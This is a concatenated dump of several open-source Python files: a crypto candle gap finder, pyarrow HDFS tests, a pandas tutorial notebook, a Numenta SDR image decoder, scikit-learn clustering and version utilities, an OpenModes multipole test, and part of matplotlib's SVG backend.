                    int(_data.iloc[0].time_stamp),
                    '{} to {}'.format(start_epoch,
                                      _data.iloc[0].date)
                ]
            ],
            columns=['expected',
                     'between',
                     'missing']
        )
    expected = None
    # Walk the sorted sequence of absent bar times and merge consecutive
    # absences into contiguous [expected, between] gap intervals.
    for x in range(0, len(leak_datetime)):
        if (expected is None):
            expected = int(leak_datetime[x].timestamp())
        if ((expected is not None) and (x > 1) and (int(leak_datetime[x].timestamp()) != int(leak_datetime[x - 1].timestamp() + FREQUENCE_PERIOD_TIME[freq]))) or \
                ((expected is not None) and (x > 1) and (x == len(leak_datetime) - 1)):
            between = int(
                leak_datetime[x - 1].timestamp() + FREQUENCE_PERIOD_TIME[freq]
            )
            miss_kline = miss_kline.append(
                {
                    'expected':
                        int(expected),
                    'between':
                        int(between),
                    'missing':
                        '{} to {}'.format(
                            pd.to_datetime(expected,
                                           unit='s'
                                           ).tz_localize('Asia/Shanghai'),
                            pd.to_datetime(between,
                                           unit='s'
                                           ).tz_localize('Asia/Shanghai')
                        )
                },
                ignore_index=True
            )
            expected = int(leak_datetime[x].timestamp())
    if (int(_data.iloc[-1].time_stamp) + 1 < int(
            QA_util_datetime_to_Unix_timestamp())):
        # Trailing gap between the newest stored bar and "now".
        miss_kline = miss_kline.append(
            {
                'expected':
                    int(_data.iloc[-1].time_stamp) + 1,
                'between':
                    int(QA_util_datetime_to_Unix_timestamp()),
                'missing':
                    '{} to {}'.format(
                        # BUG FIX: this message previously used iloc[0]
                        # although the 'expected' field above is computed
                        # from iloc[-1].
                        int(_data.iloc[-1].time_stamp) + 1,
                        QA_util_datetime_to_Unix_timestamp()
                    )
            },
            ignore_index=True
        )
    miss_kline.sort_values(by='expected', ascending=True, inplace=True)
    if (len(miss_kline) > 0):
        if (miss_kline.iloc[0].expected > QA_util_datetime_to_Unix_timestamp()) and \
                (miss_kline.iloc[0].between > QA_util_datetime_to_Unix_timestamp()):
            # BUG FIX: DataFrame.drop expects row labels; the original
            # passed miss_kline.iloc[0] (a Series of row *values*), which
            # raises KeyError instead of dropping the first row.
            miss_kline.drop(miss_kline.index[0], inplace=True)
    return miss_kline.values
if __name__ == '__main__':
print(QA_util_find_missing_kline('btcusdt', FREQUENCE.ONE_MIN))
| mit |
TheNeuralBit/arrow | python/pyarrow/tests/test_hdfs.py | 3 | 6134 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from io import BytesIO
from os.path import join as pjoin
import os
import random
import unittest
import numpy as np
import pandas.util.testing as pdt
import pytest
from pyarrow.compat import guid
from pyarrow.filesystem import HdfsClient
import pyarrow.io as io
import pyarrow as pa
import pyarrow.tests.test_parquet as test_parquet
# ----------------------------------------------------------------------
# HDFS tests
def hdfs_test_client(driver='libhdfs'):
    """Build an HdfsClient configured from the ARROW_HDFS_TEST_* env vars.

    ARROW_HDFS_TEST_USER is required; host and port fall back to
    localhost:20500 when unset.
    """
    host = os.environ.get('ARROW_HDFS_TEST_HOST', 'localhost')
    user = os.environ['ARROW_HDFS_TEST_USER']
    raw_port = os.environ.get('ARROW_HDFS_TEST_PORT', 20500)
    try:
        port = int(raw_port)
    except ValueError:
        raise ValueError('Env variable ARROW_HDFS_TEST_PORT was not '
                         'an integer')
    return HdfsClient(host, port, user, driver=driver)
@pytest.mark.hdfs
class HdfsTestCases(object):
def _make_test_file(self, hdfs, test_name, test_path, test_data):
base_path = pjoin(self.tmp_path, test_name)
hdfs.mkdir(base_path)
full_path = pjoin(base_path, test_path)
with hdfs.open(full_path, 'wb') as f:
f.write(test_data)
return full_path
@classmethod
def setUpClass(cls):
cls.check_driver()
cls.hdfs = hdfs_test_client(cls.DRIVER)
cls.tmp_path = '/tmp/pyarrow-test-{0}'.format(random.randint(0, 1000))
cls.hdfs.mkdir(cls.tmp_path)
@classmethod
def tearDownClass(cls):
cls.hdfs.delete(cls.tmp_path, recursive=True)
cls.hdfs.close()
def test_hdfs_close(self):
client = hdfs_test_client()
assert client.is_open
client.close()
assert not client.is_open
with pytest.raises(Exception):
client.ls('/')
def test_hdfs_mkdir(self):
path = pjoin(self.tmp_path, 'test-dir/test-dir')
parent_path = pjoin(self.tmp_path, 'test-dir')
self.hdfs.mkdir(path)
assert self.hdfs.exists(path)
self.hdfs.delete(parent_path, recursive=True)
assert not self.hdfs.exists(path)
def test_hdfs_ls(self):
base_path = pjoin(self.tmp_path, 'ls-test')
self.hdfs.mkdir(base_path)
dir_path = pjoin(base_path, 'a-dir')
f1_path = pjoin(base_path, 'a-file-1')
self.hdfs.mkdir(dir_path)
f = self.hdfs.open(f1_path, 'wb')
f.write('a' * 10)
contents = sorted(self.hdfs.ls(base_path, False))
assert contents == [dir_path, f1_path]
def test_hdfs_download_upload(self):
base_path = pjoin(self.tmp_path, 'upload-test')
data = b'foobarbaz'
buf = BytesIO(data)
buf.seek(0)
self.hdfs.upload(base_path, buf)
out_buf = BytesIO()
self.hdfs.download(base_path, out_buf)
out_buf.seek(0)
assert out_buf.getvalue() == data
def test_hdfs_file_context_manager(self):
path = pjoin(self.tmp_path, 'ctx-manager')
data = b'foo'
with self.hdfs.open(path, 'wb') as f:
f.write(data)
with self.hdfs.open(path, 'rb') as f:
assert f.size() == 3
result = f.read(10)
assert result == data
def test_hdfs_read_whole_file(self):
path = pjoin(self.tmp_path, 'read-whole-file')
data = b'foo' * 1000
with self.hdfs.open(path, 'wb') as f:
f.write(data)
with self.hdfs.open(path, 'rb') as f:
result = f.read()
assert result == data
@test_parquet.parquet
def test_hdfs_read_multiple_parquet_files(self):
import pyarrow.parquet as pq
nfiles = 10
size = 5
tmpdir = pjoin(self.tmp_path, 'multi-parquet-' + guid())
self.hdfs.mkdir(tmpdir)
test_data = []
paths = []
for i in range(nfiles):
df = test_parquet._test_dataframe(size, seed=i)
df['index'] = np.arange(i * size, (i + 1) * size)
# Hack so that we don't have a dtype cast in v1 files
df['uint32'] = df['uint32'].astype(np.int64)
path = pjoin(tmpdir, '{0}.parquet'.format(i))
table = pa.Table.from_pandas(df)
with self.hdfs.open(path, 'wb') as f:
pq.write_table(table, f)
test_data.append(table)
paths.append(path)
result = self.hdfs.read_parquet(tmpdir)
expected = pa.concat_tables(test_data)
pdt.assert_frame_equal(result.to_pandas()
.sort_values(by='index').reset_index(drop=True),
expected.to_pandas())
class TestLibHdfs(HdfsTestCases, unittest.TestCase):
DRIVER = 'libhdfs'
@classmethod
def check_driver(cls):
if not io.have_libhdfs():
pytest.fail('No libhdfs available on system')
def test_hdfs_orphaned_file(self):
hdfs = hdfs_test_client()
file_path = self._make_test_file(hdfs, 'orphaned_file_test', 'fname',
'foobarbaz')
f = hdfs.open(file_path)
hdfs = None
f = None # noqa
class TestLibHdfs3(HdfsTestCases, unittest.TestCase):
DRIVER = 'libhdfs3'
@classmethod
def check_driver(cls):
if not io.have_libhdfs3():
pytest.fail('No libhdfs3 available on system')
| apache-2.0 |
morganwallace/open_data | notebooks/Day_04_A_PfDA.py | 2 | 3708 | # -*- coding: utf-8 -*-
# <nbformat>3.0</nbformat>
# <headingcell level=1>
# How to use Python for Data Analysis (PfDA)
# <markdowncell>
#
# *Reading Assigned a while ago from PfDA*
#
# * read [`PfDA`, Chap 1 Preliminaries](http://proquest.safaribooksonline.com/book/programming/python/9781449323592/1dot-preliminaries/id2664030), especially the installation instructions for EPD Free for your computer platform. I want you to try installing EPD Free (or EPD Academic) before class on Thursday.
# * read [`PfDA`, Chap 3](http://proquest.safaribooksonline.com/book/programming/python/9781449323592/3dot-ipython-an-interactive-computing-and-development-environment/id2545624)
# * skim [`PfDA`, Appendix: Python Language Essentials](http://proquest.safaribooksonline.com/book/programming/python/9781449323592/adot-python-language-essentials/id2819503) -- to help remind yourself of key elements of standard Python
# * skim [`PfDA`, Chap 2 Introductory Examples](http://proquest.safaribooksonline.com/book/programming/python/9781449323592/2dot-introductory-examples/id423077)
# <markdowncell>
# * Github repo for book: [pydata/pydata-book](https://github.com/pydata/pydata-book)
# * [Confirmed Errata | O'Reilly Media Python for Data Analysis](http://www.oreilly.com/catalog/errata.csp?isbn=0636920023784)
# * [Unconfirmed Errata | O'Reilly Media Python for Data Analysis](http://www.oreilly.com/catalog/errataunconfirmed.csp?isbn=0636920023784)
# <markdowncell>
# I suggest cloning the repo somewhere on your computer
#
# my own setup: I've git cloned
#
# https://github.com/pydata/pydata-book.git
#
# into
#
# /Users/raymondyee/D/Document/Working_with_Open_Data/pydata-book/
#
# and put a symbolic link to /Users/raymondyee/D/Document/Working_with_Open_Data/pydata-book/ in my working-with-open-data-2014 repo parallel to the notebooks directory.
# <codecell>
%%bash
# this is what I ran on my mac to make this link
cd ..
ln -s /Users/raymondyee/D/Document/Working_with_Open_Data/pydata-book/ pydata-book
# <codecell>
%%bash
# in my case, I had been adding other notebooks
ls ../pydata-book/
# <headingcell level=1>
# Calculate PFDA_PATH (for RY's relative dir setup) or set it manually
# <codecell>
#http://stackoverflow.com/a/17295128/7782
import os
PFDA_PATH = os.path.abspath(os.path.join(os.getcwd(),
os.path.join(os.path.pardir, "pydata-book")
))
PFDA_PATH
# <codecell>
assert os.path.exists(PFDA_PATH)
# <headingcell level=1>
# Chapter 1
# <codecell>
# locate the bit.ly data file and make sure it exists
import os
path = os.path.join(PFDA_PATH,'ch02/usagov_bitly_data2012-03-16-1331923249.txt')
print "bit.ly data file exists: ", os.path.exists(path)
# <codecell>
# let's try some of the code from PfDA
# read a line
open(path).readline()
# <codecell>
import json
records = [json.loads(line) for line in open(path)]
time_zones = [rec.get('tz') for rec in records]
# <codecell>
time_zones
# <headingcell level=2>
# Jumping to "Counting Time Zones with pandas" (p.21)
# <codecell>
from pandas import DataFrame, Series
import pandas as pd
# <codecell>
frame = DataFrame(records) # records is a list of dicts
# <codecell>
frame['tz'].value_counts()
# <codecell>
# fill missing
clean_tz = frame['tz'].fillna('Missing')
clean_tz.value_counts()
# <codecell>
clean_tz[clean_tz==''] = 'Unknown'
# <codecell>
clean_tz.value_counts()
# <codecell>
# let's embed the plot inline
%pylab --no-import-all inline
# <codecell>
tz_counts = clean_tz.value_counts()
# <codecell>
tz_counts[:10].plot(kind='barh', rot=0)
# <markdowncell>
# And so on....
| apache-2.0 |
numenta/nupic.research | projects/visual_recognition_grid_cells/SDR_decoder.py | 3 | 7700 | # Numenta Platform for Intelligent Computing (NuPIC)
# Copyright (C) 2020, Numenta, Inc. Unless you have an agreement
# with Numenta, Inc., for a separate license for this software code, the
# following terms and conditions apply:
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU Affero Public License for more details.
#
# You should have received a copy of the GNU Affero Public License
# along with this program. If not, see http://www.gnu.org/licenses.
#
# http://numenta.org/licenses/
#
"""
Trains a decoder to reconstruct input images from SDRs
"""
import math
import os
import matplotlib.pyplot as plt
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
from torchvision import datasets
torch.manual_seed(18)
np.random.seed(18)
DATASET = "mnist"
TRAIN_NEW_NET = True
EPOCHS = 10 # Recommend 10
BATCH_SIZE = 64 # Recommend 64
class MLPDecoder(torch.nn.Module):
    """Two-layer MLP decoder mapping a flattened 128*5*5 SDR to a 28x28 image."""

    def __init__(self):
        super(MLPDecoder, self).__init__()
        # Hidden projection followed by a per-pixel output layer.
        # Attribute names are kept so saved state_dicts still load.
        self.dense1 = nn.Linear(in_features=128 * 5 * 5, out_features=512)
        self.dense2 = nn.Linear(in_features=512, out_features=28 * 28)

    def forward(self, x):
        hidden = F.relu(self.dense1(x))
        # sigmoid keeps every reconstructed pixel in [0, 1]
        pixels = torch.sigmoid(self.dense2(hidden))
        return pixels.view(-1, 28, 28)
def initialize():
net = MLPDecoder()
# SDR inputs that the decoder needs to use to reconstruct images
training_input = torch.from_numpy(np.load("python2_htm_docker/docker_dir/training_"
"and_testing_data/" + DATASET
+ "_SDRs_base_net_training.npy"))
testing_input = torch.from_numpy(np.load("python2_htm_docker/docker_dir/training_"
"and_testing_data/" + DATASET
+ "_SDRs_SDR_classifiers_training.npy"))
# The "sources" are the original images that need to be reconstructed
if DATASET == "mnist":
print("Using MNIST data-set")
total_sources = datasets.MNIST(
"data", train=True,
download=True).train_data.float() / 255
testing_sdrc_classifiers_dataset = datasets.MNIST(
"data", train=False,
download=True).train_data.float() / 255
# Note not used by auto-encoder but used to save output images from Torchvision
# for later use by GridCellNet
elif DATASET == "fashion_mnist":
print("Using Fashion-MNIST data-set")
total_sources = datasets.FashionMNIST(
"data", train=True, download=True).train_data.float() / 255
testing_sdrc_classifiers_dataset = datasets.FashionMNIST(
"data", train=False, download=True).train_data.float() / 255
total_len = len(total_sources)
print("Using hold-out cross-validation data-set for evaluating decoder")
indices = range(total_len)
val_split = int(np.floor(0.1 * total_len))
train_idx, test_decoder_idx = indices[val_split:], indices[:val_split]
training_sources = total_sources[train_idx]
testing_decoder_sources = total_sources[test_decoder_idx]
training_labels = torch.from_numpy(
np.load("python2_htm_docker/docker_dir/training_and_testing_data/"
+ DATASET + "_labels_base_net_training.npy"))
testing_labels = torch.from_numpy(
np.load("python2_htm_docker/docker_dir/training_and_testing_data/"
+ DATASET + "_labels_SDR_classifiers_training.npy"))
np.save("python2_htm_docker/docker_dir/training_and_testing_data/" + DATASET
+ "_images_SDR_classifiers_training", testing_decoder_sources)
np.save("python2_htm_docker/docker_dir/training_and_testing_data/" + DATASET
+ "_images_SDR_classifiers_testing", testing_sdrc_classifiers_dataset)
return (net, training_input, testing_input, training_sources,
testing_decoder_sources, training_labels, testing_labels)
def train_net(net, training_input, training_sources, training_labels):
criterion = torch.nn.MSELoss()
optimizer = torch.optim.Adam(net.parameters(), lr=1e-3)
for epoch in range(EPOCHS):
running_loss = 0
for batch_iter in range(math.ceil(len(training_labels) / BATCH_SIZE)):
batch_input = training_input[batch_iter * BATCH_SIZE:min((batch_iter + 1)
* BATCH_SIZE, len(training_labels))]
batch_sources = training_sources[batch_iter * BATCH_SIZE:min((batch_iter
+ 1) * BATCH_SIZE, len(training_labels))]
optimizer.zero_grad()
reconstructed = net(batch_input)
loss = criterion(reconstructed, batch_sources)
loss.backward()
optimizer.step()
running_loss += loss.item()
print("\nEpoch:" + str(epoch))
print("Training loss is " + str(running_loss / len(training_labels)))
print("Saving network state...")
torch.save(net.state_dict(), "saved_networks/" + DATASET + "_decoder.pt")
print("Finished Training")
def generate_images(net, net_input, sources, labels):
net.load_state_dict(torch.load("saved_networks/" + DATASET + "_decoder.pt"))
# Re-construct one batch worth of testing examples and save as images
for batch_iter in range(1):
batch_input = net_input[batch_iter * BATCH_SIZE:min((batch_iter + 1)
* BATCH_SIZE, len(labels))]
batch_sources = sources[batch_iter * BATCH_SIZE:min((batch_iter + 1)
* BATCH_SIZE, len(labels))]
batch_labels = labels[batch_iter * BATCH_SIZE:min((batch_iter + 1)
* BATCH_SIZE, len(labels))]
reconstructed = net(batch_input)
for image_iter in range(len(batch_labels)):
plt.imsave("decoder_reconstructed_images/" + str(batch_iter) + "_"
+ str(image_iter) + "_original_label_"
+ str(batch_labels[image_iter].item()) + ".png",
batch_sources.detach().numpy()[image_iter])
plt.imsave("decoder_reconstructed_images/" + str(batch_iter) + "_"
+ str(image_iter) + "_reconstructed_label_"
+ str(batch_labels[image_iter].item()) + ".png",
reconstructed.detach().numpy()[image_iter])
if __name__ == "__main__":
if os.path.exists("decoder_reconstructed_images/") is False:
try:
os.mkdir("decoder_reconstructed_images/")
except OSError:
pass
(net, training_input, testing_input, training_sources, testing_sources,
training_labels, testing_labels) = initialize()
if TRAIN_NEW_NET is True:
print("Training new network")
train_net(net, training_input, training_sources, training_labels)
print("Generating images from newly trained network using unseen data")
generate_images(net, net_input=testing_input, sources=testing_sources,
labels=testing_labels)
elif TRAIN_NEW_NET is False:
print("Generating images from previously trained network using unseen data")
generate_images(net, net_input=testing_input, sources=testing_sources,
labels=testing_labels)
| agpl-3.0 |
JPFrancoia/scikit-learn | examples/cluster/plot_cluster_comparison.py | 58 | 4681 | """
=========================================================
Comparing different clustering algorithms on toy datasets
=========================================================
This example aims at showing characteristics of different
clustering algorithms on datasets that are "interesting"
but still in 2D. The last dataset is an example of a 'null'
situation for clustering: the data is homogeneous, and
there is no good clustering.
While these examples give some intuition about the algorithms,
this intuition might not apply to very high dimensional data.
The results could be improved by tweaking the parameters for
each clustering strategy, for instance setting the number of
clusters for the methods that needs this parameter
specified. Note that affinity propagation has a tendency to
create many clusters. Thus in this example its two parameters
(damping and per-point preference) were set to mitigate this
behavior.
"""
print(__doc__)
import time
import numpy as np
import matplotlib.pyplot as plt
from sklearn import cluster, datasets
from sklearn.neighbors import kneighbors_graph
from sklearn.preprocessing import StandardScaler
np.random.seed(0)
# Generate datasets. We choose the size big enough to see the scalability
# of the algorithms, but not too big to avoid too long running times
n_samples = 1500
noisy_circles = datasets.make_circles(n_samples=n_samples, factor=.5,
noise=.05)
noisy_moons = datasets.make_moons(n_samples=n_samples, noise=.05)
blobs = datasets.make_blobs(n_samples=n_samples, random_state=8)
no_structure = np.random.rand(n_samples, 2), None
colors = np.array([x for x in 'bgrcmykbgrcmykbgrcmykbgrcmyk'])
colors = np.hstack([colors] * 20)
clustering_names = [
'MiniBatchKMeans', 'AffinityPropagation', 'MeanShift',
'SpectralClustering', 'Ward', 'AgglomerativeClustering',
'DBSCAN', 'Birch']
plt.figure(figsize=(len(clustering_names) * 2 + 3, 9.5))
plt.subplots_adjust(left=.02, right=.98, bottom=.001, top=.96, wspace=.05,
hspace=.01)
plot_num = 1
datasets = [noisy_circles, noisy_moons, blobs, no_structure]
for i_dataset, dataset in enumerate(datasets):
X, y = dataset
# normalize dataset for easier parameter selection
X = StandardScaler().fit_transform(X)
# estimate bandwidth for mean shift
bandwidth = cluster.estimate_bandwidth(X, quantile=0.3)
# connectivity matrix for structured Ward
connectivity = kneighbors_graph(X, n_neighbors=10, include_self=False)
# make connectivity symmetric
connectivity = 0.5 * (connectivity + connectivity.T)
# create clustering estimators
ms = cluster.MeanShift(bandwidth=bandwidth, bin_seeding=True)
two_means = cluster.MiniBatchKMeans(n_clusters=2)
ward = cluster.AgglomerativeClustering(n_clusters=2, linkage='ward',
connectivity=connectivity)
spectral = cluster.SpectralClustering(n_clusters=2,
eigen_solver='arpack',
affinity="nearest_neighbors")
dbscan = cluster.DBSCAN(eps=.2)
affinity_propagation = cluster.AffinityPropagation(damping=.9,
preference=-200)
average_linkage = cluster.AgglomerativeClustering(
linkage="average", affinity="cityblock", n_clusters=2,
connectivity=connectivity)
birch = cluster.Birch(n_clusters=2)
clustering_algorithms = [
two_means, affinity_propagation, ms, spectral, ward, average_linkage,
dbscan, birch]
for name, algorithm in zip(clustering_names, clustering_algorithms):
# predict cluster memberships
t0 = time.time()
algorithm.fit(X)
t1 = time.time()
if hasattr(algorithm, 'labels_'):
y_pred = algorithm.labels_.astype(np.int)
else:
y_pred = algorithm.predict(X)
# plot
plt.subplot(4, len(clustering_algorithms), plot_num)
if i_dataset == 0:
plt.title(name, size=18)
plt.scatter(X[:, 0], X[:, 1], color=colors[y_pred].tolist(), s=10)
if hasattr(algorithm, 'cluster_centers_'):
centers = algorithm.cluster_centers_
center_colors = colors[:len(centers)]
plt.scatter(centers[:, 0], centers[:, 1], s=100, c=center_colors)
plt.xlim(-2, 2)
plt.ylim(-2, 2)
plt.xticks(())
plt.yticks(())
plt.text(.99, .01, ('%.2fs' % (t1 - t0)).lstrip('0'),
transform=plt.gca().transAxes, size=15,
horizontalalignment='right')
plot_num += 1
plt.show()
| bsd-3-clause |
xuewei4d/scikit-learn | sklearn/utils/_show_versions.py | 13 | 1961 | """
Utility methods to print system info for debugging
adapted from :func:`pandas.show_versions`
"""
# License: BSD 3 clause
import platform
import sys
import importlib
from ._openmp_helpers import _openmp_parallelism_enabled
def _get_sys_info():
"""System information
Returns
-------
sys_info : dict
system and Python version information
"""
python = sys.version.replace('\n', ' ')
blob = [
("python", python),
('executable', sys.executable),
("machine", platform.platform()),
]
return dict(blob)
def _get_deps_info():
"""Overview of the installed version of main dependencies
Returns
-------
deps_info: dict
version information on relevant Python libraries
"""
deps = [
"pip",
"setuptools",
"sklearn",
"numpy",
"scipy",
"Cython",
"pandas",
"matplotlib",
"joblib",
"threadpoolctl"
]
def get_version(module):
return module.__version__
deps_info = {}
for modname in deps:
try:
if modname in sys.modules:
mod = sys.modules[modname]
else:
mod = importlib.import_module(modname)
ver = get_version(mod)
deps_info[modname] = ver
except ImportError:
deps_info[modname] = None
return deps_info
def show_versions():
    """Print useful debugging information.

    .. versionadded:: 0.20
    """
    print('\nSystem:')
    for name, value in _get_sys_info().items():
        print("{k:>10}: {stat}".format(k=name, stat=value))

    print('\nPython dependencies:')
    for name, value in _get_deps_info().items():
        print("{k:>13}: {stat}".format(k=name, stat=value))

    openmp_enabled = _openmp_parallelism_enabled()
    print("\n{k}: {stat}".format(k="Built with OpenMP", stat=openmp_enabled))
| bsd-3-clause |
DavidPowell/OpenModes | test/test_multipoles.py | 1 | 3921 | # -*- coding: utf-8 -*-
"""
Created on Fri Mar 18 16:59:21 2016
@author: dap124
"""
import numpy as np
import os.path as osp
import matplotlib.pyplot as plt
import openmodes
from openmodes.mesh import gmsh
from openmodes.constants import c
from openmodes.sources import PlaneWaveSource
import helpers
tests_filename = __file__
input_dir = helpers.get_input_dir(tests_filename)
meshfile = osp.join(input_dir, 'sphere.msh')
def generate_mesh():
"Generate a fixed mesh file to ensure consistent results of tests"
meshed_name = gmsh.mesh_geometry(osp.join(openmodes.geometry_dir, 'sphere.geo'),
input_dir, parameters={'radius': 1, 'mesh_tol': 0.3})
assert(meshed_name == meshfile)
def pec_sphere_multipoles(plot=False):
"Multipole expansion of a PEC sphere"
sim = openmodes.Simulation(name='pec_sphere_multipoles')
mesh = sim.load_mesh(meshfile)
sim.place_part(mesh)
k0r = np.linspace(0.1, 3, 50)
freqs = k0r*c/(2*np.pi)
pw = PlaneWaveSource([1, 0, 0], [0, 0, 1], p_inc=1.0)
multipole_order = 4
extinction = np.empty(len(freqs), dtype=np.complex128)
a_e = {}
a_m = {}
for l in range(multipole_order+1):
for m in range(-l, l+1):
a_e[l, m] = np.empty(len(freqs), dtype=np.complex128)
a_m[l, m] = np.empty(len(freqs), dtype=np.complex128)
for freq_count, s in sim.iter_freqs(freqs):
Z = sim.impedance(s)
V = sim.source_vector(pw, s)
V_E = sim.source_vector(pw, s, extinction_field=True)
I = Z.solve(V)
extinction[freq_count] = np.vdot(V_E, I)
a_en, a_mn = sim.multipole_decomposition(I, multipole_order, s)
for l in range(multipole_order+1):
for m in range(-l, l+1):
a_e[l, m][freq_count] = a_en[l, m]
a_m[l, m][freq_count] = a_mn[l, m]
if plot:
plt.figure()
plt.plot(k0r, extinction.real)
plt.plot(k0r, np.pi/k0r**2*sum(sum((np.abs(a_e[l, m])**2+np.abs(a_m[l, m])**2) for m in range(-l, l+1))
for l in range(1, multipole_order+1)), 'x')
plt.plot(k0r, np.pi/k0r**2*sum(sum(np.sqrt(2*l+1)*(-m*a_e[l, m].real-a_m[l, m].real) for m in range(-l, l+1))
for l in range(1, multipole_order+1)), '+')
plt.xlabel('$k_{0}r$')
plt.title("Total extinction vs multipole extinction and scattering")
plt.show()
plt.figure()
for l in range(1, multipole_order+1):
for m in range(-l, l+1):
plt.plot(k0r, np.pi/k0r**2*np.abs(a_e[l, m])**2)
plt.plot(k0r, np.pi/k0r**2*np.abs(a_m[l, m])**2, '--')
plt.title("Multipole contributions to scattering")
plt.xlabel('$k_{0}r$')
plt.show()
plt.figure()
for l in range(1, multipole_order+1):
for m in (-1, 1):
plt.plot(k0r, -np.pi/k0r**2*np.sqrt(2*l+1)*m*a_e[l, m].real)
plt.plot(k0r, -np.pi/k0r**2*np.sqrt(2*l+1)*a_m[l, m].real, '--')
plt.title("Multipole contributions to extinction")
plt.xlabel('$k_{0}r$')
plt.show()
else:
return {'name': 'pec_sphere_multipoles',
'results': {'k0r': k0r, 'extinction': extinction,
'a_e': a_e, 'a_m': a_m},
'rtol': {'a_e': 1e-6, 'a_m': 1e-6}}
# The following boilerplate code is needed to generate an actual test from
# the function
def test_pec_sphere_multipoles():
helpers.run_test(pec_sphere_multipoles, tests_filename)
test_pec_sphere_multipoles.__doc__ = pec_sphere_multipoles.__doc__
if __name__ == "__main__":
# Uncomment the following lines to update reference solutions
# generate_mesh()
# helpers.create_reference(pec_sphere_multipoles, tests_filename)
# Run the tested functions to produce plots, without any checks
pec_sphere_multipoles(plot=True)
| gpl-3.0 |
loretoparisi/nupic | external/linux32/lib/python2.6/site-packages/matplotlib/backends/backend_svg.py | 69 | 23593 | from __future__ import division
import os, codecs, base64, tempfile, urllib, gzip, cStringIO
try:
from hashlib import md5
except ImportError:
from md5 import md5 #Deprecated in 2.5
from matplotlib import verbose, __version__, rcParams
from matplotlib.backend_bases import RendererBase, GraphicsContextBase,\
FigureManagerBase, FigureCanvasBase
from matplotlib.backends.backend_mixed import MixedModeRenderer
from matplotlib.cbook import is_string_like, is_writable_file_like, maxdict
from matplotlib.colors import rgb2hex
from matplotlib.figure import Figure
from matplotlib.font_manager import findfont, FontProperties
from matplotlib.ft2font import FT2Font, KERNING_DEFAULT, LOAD_NO_HINTING
from matplotlib.mathtext import MathTextParser
from matplotlib.path import Path
from matplotlib.transforms import Affine2D
from matplotlib import _png
from xml.sax.saxutils import escape as escape_xml_text
backend_version = __version__
def new_figure_manager(num, *args, **kwargs):
FigureClass = kwargs.pop('FigureClass', Figure)
thisFig = FigureClass(*args, **kwargs)
canvas = FigureCanvasSVG(thisFig)
manager = FigureManagerSVG(canvas, num)
return manager
_capstyle_d = {'projecting' : 'square', 'butt' : 'butt', 'round': 'round',}
class RendererSVG(RendererBase):
FONT_SCALE = 100.0
fontd = maxdict(50)
def __init__(self, width, height, svgwriter, basename=None):
self.width=width
self.height=height
self._svgwriter = svgwriter
if rcParams['path.simplify']:
self.simplify = (width, height)
else:
self.simplify = None
self._groupd = {}
if not rcParams['svg.image_inline']:
assert basename is not None
self.basename = basename
self._imaged = {}
self._clipd = {}
self._char_defs = {}
self._markers = {}
self._path_collection_id = 0
self._imaged = {}
self.mathtext_parser = MathTextParser('SVG')
svgwriter.write(svgProlog%(width,height,width,height))
def _draw_svg_element(self, element, details, gc, rgbFace):
clipid = self._get_gc_clip_svg(gc)
if clipid is None:
clippath = ''
else:
clippath = 'clip-path="url(#%s)"' % clipid
if gc.get_url() is not None:
self._svgwriter.write('<a xlink:href="%s">' % gc.get_url())
style = self._get_style(gc, rgbFace)
self._svgwriter.write ('<%s style="%s" %s %s/>\n' % (
element, style, clippath, details))
if gc.get_url() is not None:
self._svgwriter.write('</a>')
def _get_font(self, prop):
key = hash(prop)
font = self.fontd.get(key)
if font is None:
fname = findfont(prop)
font = self.fontd.get(fname)
if font is None:
font = FT2Font(str(fname))
self.fontd[fname] = font
self.fontd[key] = font
font.clear()
size = prop.get_size_in_points()
font.set_size(size, 72.0)
return font
def _get_style(self, gc, rgbFace):
"""
return the style string.
style is generated from the GraphicsContext, rgbFace and clippath
"""
if rgbFace is None:
fill = 'none'
else:
fill = rgb2hex(rgbFace[:3])
offset, seq = gc.get_dashes()
if seq is None:
dashes = ''
else:
dashes = 'stroke-dasharray: %s; stroke-dashoffset: %f;' % (
','.join(['%f'%val for val in seq]), offset)
linewidth = gc.get_linewidth()
if linewidth:
return 'fill: %s; stroke: %s; stroke-width: %f; ' \
'stroke-linejoin: %s; stroke-linecap: %s; %s opacity: %f' % (
fill,
rgb2hex(gc.get_rgb()[:3]),
linewidth,
gc.get_joinstyle(),
_capstyle_d[gc.get_capstyle()],
dashes,
gc.get_alpha(),
)
else:
return 'fill: %s; opacity: %f' % (\
fill,
gc.get_alpha(),
)
def _get_gc_clip_svg(self, gc):
cliprect = gc.get_clip_rectangle()
clippath, clippath_trans = gc.get_clip_path()
if clippath is not None:
path_data = self._convert_path(clippath, clippath_trans)
path = '<path d="%s"/>' % path_data
elif cliprect is not None:
x, y, w, h = cliprect.bounds
y = self.height-(y+h)
path = '<rect x="%(x)f" y="%(y)f" width="%(w)f" height="%(h)f"/>' % locals()
else:
return None
id = self._clipd.get(path)
if id is None:
id = 'p%s' % md5(path).hexdigest()
self._svgwriter.write('<defs>\n <clipPath id="%s">\n' % id)
self._svgwriter.write(path)
self._svgwriter.write('\n </clipPath>\n</defs>')
self._clipd[path] = id
return id
def open_group(self, s):
self._groupd[s] = self._groupd.get(s,0) + 1
self._svgwriter.write('<g id="%s%d">\n' % (s, self._groupd[s]))
def close_group(self, s):
self._svgwriter.write('</g>\n')
def option_image_nocomposite(self):
"""
if svg.image_noscale is True, compositing multiple images into one is prohibited
"""
return rcParams['svg.image_noscale']
_path_commands = {
Path.MOVETO: 'M%f %f',
Path.LINETO: 'L%f %f',
Path.CURVE3: 'Q%f %f %f %f',
Path.CURVE4: 'C%f %f %f %f %f %f'
}
def _make_flip_transform(self, transform):
return (transform +
Affine2D()
.scale(1.0, -1.0)
.translate(0.0, self.height))
def _convert_path(self, path, transform, simplify=None):
